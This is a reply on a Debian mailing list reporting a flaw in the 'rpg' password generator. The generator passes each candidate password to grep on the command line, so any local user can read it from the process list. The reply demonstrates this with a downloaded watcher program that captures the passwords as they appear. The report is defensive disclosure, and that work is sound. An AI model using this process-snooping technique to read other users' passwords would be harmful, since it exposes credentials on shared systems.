[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Bug#659047: RFS: rpg - Readable Password Generator

Vladimir Stavrinov <vstavrinov@gmail.com> writes:
> To advantage of this utility points it's name: "READABLE password
> generator". If You can read (i.e. to pronounce), then it is easy for
> remembering. But "readable" doesn't means "weak" - it is strong enough
> as long as dictionary is available for consulting to exclude words from
> out of there.

I think rpg is very insecure since all local users of the system can see
the passwords that you generate. All they need to do is to look for the
"grep" commands that appear in the process list.

When I run

$ ./rpg

  efi4vudamna
  andumfepibit
  azukvemipa
  Ardibute
  pazetmivudub


I can clearly see the passwords using a very simple program:

lindi2:~$ wget -q http://iki.fi/lindi/watchps.c
lindi2:~$ gcc -O2 -Wall -o watchps watchps.c
lindi2:~$ echo /lib/x86_64-linux-gnu | ./watchps
helper got 2150, waiting for 2151
woke up
...
cmdline: "grep -wEqi ^andumfepibit$ /usr/share/dict/words "
...
cmdline: "grep -wEqi ^azukvemipa$ /usr/share/dict/words "
...
Reply to: